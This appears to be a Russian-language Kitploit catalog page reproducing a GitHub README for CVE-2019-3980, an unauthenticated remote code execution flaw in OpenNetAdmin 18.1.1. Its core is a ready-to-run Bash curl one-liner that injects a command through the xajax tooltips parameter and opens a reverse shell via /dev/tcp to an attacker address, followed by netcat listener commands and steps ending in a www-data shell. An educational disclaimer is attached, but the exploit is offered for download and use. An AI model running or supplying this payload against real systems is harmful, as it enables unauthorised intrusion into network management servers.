Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-3980-Open_Net_Admin_v18.1.1_RCE — Эксплойт на основе Bash для CVE-2019-3980, нацеленный на OpenNetAdmin 18.1.1, обеспечивающий неаутентифицированное удаленное выполнение кода через внедрение команд и обратную оболочку. | Kitploit
Инструменты/GitHubGitHub/cyberquestor-infosec/cve-2019-3980-open_net_admin_v18.1.1_rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHubcyberquestor-infosec/cve-2019-3980-open_net_admin_v18.1.1_rce

CVE-2019-3980-Open_Net_Admin_v18.1.1_RCE

Эксплойт на основе Bash для CVE-2019-3980, нацеленный на OpenNetAdmin 18.1.1, обеспечивающий неаутентифицированное удаленное выполнение кода через внедрение команд и обратную оболочку.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
11 год назадЕщё не проверено

CVE-2019-3980 – OpenNetAdmin 18.1.1 Удаленное выполнение кода

⚠️ Отказ от ответственности
Этот репозиторий предназначен строго только для образовательных и исследовательских целей.
Предоставленная здесь информация и код могут быть использованы в контролируемых средах, например, на частных лабораторных машинах.
Несанкционированное использование этого кода против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, незаконно и неэтично.
Автор не несет ответственности за любое неправомерное использование или причиненный ущерб.


🔍 О уязвимости

Уязвимость удаленного выполнения кода существует в OpenNetAdmin 18.1.1 через интерфейс AJAX-запросов xajax.
Уязвимость возникает из-за неправильной санитизации входных данных, что позволяет внедрять команды с помощью специально сформированного POST-запроса к /ona/.
Этот эксплойт использует плагин tooltips для запуска обратного шелла на прослушиватель атакующего.

  • CVE ID: CVE-2019-3980
  • Exploit-DB ID: 47691
  • Уязвимое приложение: OpenNetAdmin 18.1.1
  • Затрагиваемый параметр: xajaxargs[]
  • Воздействие: Удаленное выполнение кода
  • Требуется аутентификация: ❌ Нет
  • Требуется сетевой доступ: ✅ Да

📂 Обзор эксплойта

  • Тип эксплойта: Внедрение команд → Обратный шелл
  • Название эксплойта: OpenNetAdmin 18.1.1 – Неаутентифицированное RCE
  • ExploitDB ID: 47691
  • Язык: Bash (через curl)
  • Требуется аутентификация: ❌ Нет

⚙️ Код эксплойта

Этот кастомизированный однострочник на Bash отправляет POST-запрос к уязвимой конечной точке xajax=window_submit с внедренным кодом обратного шелла.

root@kitploit:~
#!/bin/bash

curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<YOUR-IP>%2F<YOUR-PORT>%200%3E%261%22;echo \"END\"&xajaxargs[]=ping" "http://<TARGET-IP>/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

🛠️ Примечание:
Замените <YOUR-IP> и <YOUR-PORT> на IP и порт вашего Netcat-слушателя.
Запустите слушатель с помощью:

root@kitploit:~
nc -nlvp <PORT>

🎯 Демонстрация

1. Показ веб-страницы ONA и версии

Веб-интерфейс ONA

Скриншот уязвимого интерфейса OpenNetAdmin и версии.


🚀 Использование эксплойта

2. Запуск эксплойта

root@kitploit:~
bash shell.sh

Выполнение эксплойта

Скриншот выполнения скрипта, запускающего полезную нагрузку.


🐚 Обратный шелл

3. Получение обратного шелла

root@kitploit:~
nc -nlvp <PORT>

Обратный шелл

Обратный шелл получен как www-data.


📚 Ссылки

  • Exploit-DB: CVE-2019-3980
  • Информация о CVE в NVD

📝 Блог Medium

Ознакомьтесь с подробным руководством и теорией в моей статье на Medium:
👉 Читать блог на Medium

Скачать инструмент